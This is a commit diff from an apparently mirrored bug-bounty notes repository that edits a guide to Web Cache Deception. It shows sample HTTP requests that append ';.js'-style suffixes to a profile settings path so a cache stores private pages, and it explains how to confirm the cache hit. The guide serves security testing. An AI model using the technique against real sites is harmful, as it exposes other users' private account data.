ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 10:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update Web Cache Deception

Browse Source
This commit is contained in:
Muhammad Daffa 2022-09-03 16:36:47 +07:00
parent bb8f0e7b1e
commit f82c55f9f5
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Web Cache Deception.md
View File

@ -7,7 +7,7 @@ Web Cache Deception is an attack in which an attacker deceives a caching proxy i
`-`
## How to exploit
* Normal Request
* Normal Request (For example in the settings profile feature)
```
GET /profile/setting HTTP/1.1
Host: www.vuln.com
@ -32,9 +32,9 @@ Content-Type: text/html
Cf-Cache-Status: HIT
...
```
If the response is success, try to open the url in the incognito mode.
If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode
2. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.)
1. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.)
```
GET /profile/setting/;.js HTTP/1.1
Host: www.vuln.com
@ -46,7 +46,7 @@ Content-Type: text/html
Cf-Cache-Status: HIT
...
```
If the response is success, try to open the url in the incognito mode.
If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode
## References
* [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)